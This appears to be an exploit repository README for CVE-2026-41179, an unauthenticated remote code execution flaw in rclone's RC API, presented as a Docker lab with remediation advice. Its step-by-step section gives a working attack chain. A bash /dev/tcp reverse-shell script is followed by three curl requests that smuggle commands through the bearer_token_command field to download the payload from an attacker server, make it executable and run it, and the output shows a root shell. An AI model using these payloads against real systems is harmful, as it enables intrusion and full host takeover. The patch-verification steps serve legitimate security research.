Share 
## https://sploitus.com/exploit?id=9B9009B8-AC90-5EE8-BA73-9ADB1ADB091D
# CVE-2026-41179 โ€” rclone RC API Unauthenticated RCE

> โš ๏ธ **EDUCATIONAL PURPOSES ONLY**
> This repository is intended strictly for security research, education, and authorized lab environments. PSSec and the contributors of this repository do not condone, support, or take any responsibility for any unauthorized, illegal, or malicious use of the information, code, or techniques contained herein. By using this repository you agree that you are solely responsible for your actions and that you will only test against systems you own or have explicit written permission to test.

---

## Overview

**CVE-2026-41179** is a critical unauthenticated Remote Code Execution (RCE) vulnerability in rclone's built-in Remote Control (RC) API, affecting versions **1.48.0 through 1.73.4**.

| Detail | Value |
|---|---|
| **CVE** | CVE-2026-41179 |
| **CVSS Score** | 9.8 (Critical) |
| **Affected Versions** | rclone 1.48.0 โ€“ 1.73.4 |
| **Patched Version** | rclone 1.73.5 |
| **Component** | RC API (`/operations/fsinfo` endpoint) |
| **Attack Vector** | Network โ€” no authentication required |

### How It Works

rclone ships with a built-in HTTP remote control interface (`rcd`). The `/operations/fsinfo` endpoint accepts a user-supplied `fs=` string that is parsed and used to instantiate a backend โ€” including the WebDAV backend. The WebDAV backend supports a `bearer_token_command` parameter, which is passed directly to `exec.Command()` without sanitization. Because no authentication is required on this endpoint by default, an unauthenticated attacker can trigger arbitrary OS command execution as the rclone process user.

**Attack chain in brief:**

```
POST /operations/fsinfo (no auth)
  โ†’ rc.GetFs() parses attacker-controlled fs= string
    โ†’ WebDAV backend instantiated with attacker params
      โ†’ bearer_token_command extracted
        โ†’ exec.Command() fires OS command
          โ†’ RCE as rclone process user
```

---

## Repository Structure

```
CVE-2026-41179/
โ”œโ”€โ”€ Dockerfile.rclone          # Vulnerable rclone image (v1.69.3)
โ”œโ”€โ”€ patched.Dockerfile.rclone  # Patched rclone image (v1.73.5)
โ”œโ”€โ”€ poc.sh                     # Reverse shell payload
โ””โ”€โ”€ instructions               # Step-by-step lab walkthrough
```

---

## Lab Setup & Exploitation (Step-by-Step)

### Prerequisites

- Docker
- A listener: [penelope](https://github.com/brightio/penelope) or `netcat`
- Python 3 (for serving the payload)

---

### Step 1 โ€” Build the Vulnerable Docker Image

```bash
docker build -t rclone-vuln -f Dockerfile.rclone .
```

Builds a Debian-slim container running **rclone v1.69.3** with the RC API exposed on port `5572`.

---

### Step 2 โ€” Run the Vulnerable Container

```bash
docker run -d --name rclone-vuln -p 5572:5572 rclone-vuln
```

The RC API is now accessible unauthenticated at `http://127.0.0.1:5572`.

---

### Step 3 โ€” Start Your Listener

```bash
penelope -p 5555
# OR
nc -lvnp 5555
```

---

### Step 4 โ€” Configure the Reverse Shell Payload

Edit `poc.sh` and set your attacker IP and listening port:

```bash
#!/bin/bash
bash -i >& /dev/tcp// 0>&1
```

---

### Step 5 โ€” Serve the Payload over HTTP

Run this from the same directory as `poc.sh`:

```bash
python3 -m http.server 8888
```

---

### Step 6 โ€” Download the Payload to the Target

```bash
curl -sS -X POST http://127.0.0.1:5572/operations/fsinfo \
  --data-urlencode "fs=:webdav,url='http://127.0.0.1/',vendor=other,bearer_token_command='/usr/bin/curl -o /tmp/shell.sh http://:8888/poc.sh':'
```

---

### Step 7 โ€” Make the Payload Executable

```bash
curl -sS -X POST http://127.0.0.1:5572/operations/fsinfo \
  --data-urlencode "fs=:webdav,url='http://127.0.0.1/',vendor=other,bearer_token_command='/bin/chmod +x /tmp/shell.sh':'
```

---

### Step 8 โ€” Execute the Payload

```bash
curl -sS -X POST http://127.0.0.1:5572/operations/fsinfo \
  --data-urlencode "fs=:webdav,url='http://127.0.0.1/',vendor=other,bearer_token_command='/tmp/shell.sh':'
```

---

### Step 9 โ€” Catch the Shell

Check your listener โ€” you should receive a root shell from the container:

```
[+] Got reverse shell from f7697b831050~172.17.0.3-Linux-x86_64
[+] Shell upgraded successfully using /usr/bin/script!
whoami
root
```

---

### Step 10 โ€” Verify the Patch

Repeat Steps 1โ€“8 using the **patched image** to confirm the vulnerability is fixed:

```bash
docker build -t rclone-patched -f patched.Dockerfile.rclone .
docker run -d --name rclone-patched -p 5573:5572 rclone-patched
```

Send the same `curl` request against port `5573` โ€” the command should not execute.

---

## Remediation

- **Upgrade rclone to v1.73.5 or later** โ€” authentication is now enforced on all RC endpoints by default.
- If you cannot upgrade immediately, start `rcd` with `--rc-user` and `--rc-pass` flags to require credentials.
- Restrict network access to the RC port (`5572`) via firewall rules โ€” it should never be exposed to untrusted networks.
- Consider using `--rc-no-auth=false` (the new default in patched versions) explicitly in startup scripts.

---

## Disclaimer

This repository is provided **for educational and authorized security research purposes only**. The proof-of-concept code demonstrates a real vulnerability in a controlled Docker lab environment.

**PSSec and all contributors:**
- Do **not** authorize or encourage exploitation of systems without explicit written permission from the system owner.
- Take **no responsibility** for any damage, data loss, legal consequences, or misuse arising from the use of this material.
- Recommend that all testing be performed **only in isolated lab environments** that you own or are explicitly authorized to test.

Unauthorized use of this code against production systems or systems you do not own may violate computer fraud and cybercrime laws in your jurisdiction.

---

*CVE-2026-41179 โ€” Research by PSSec*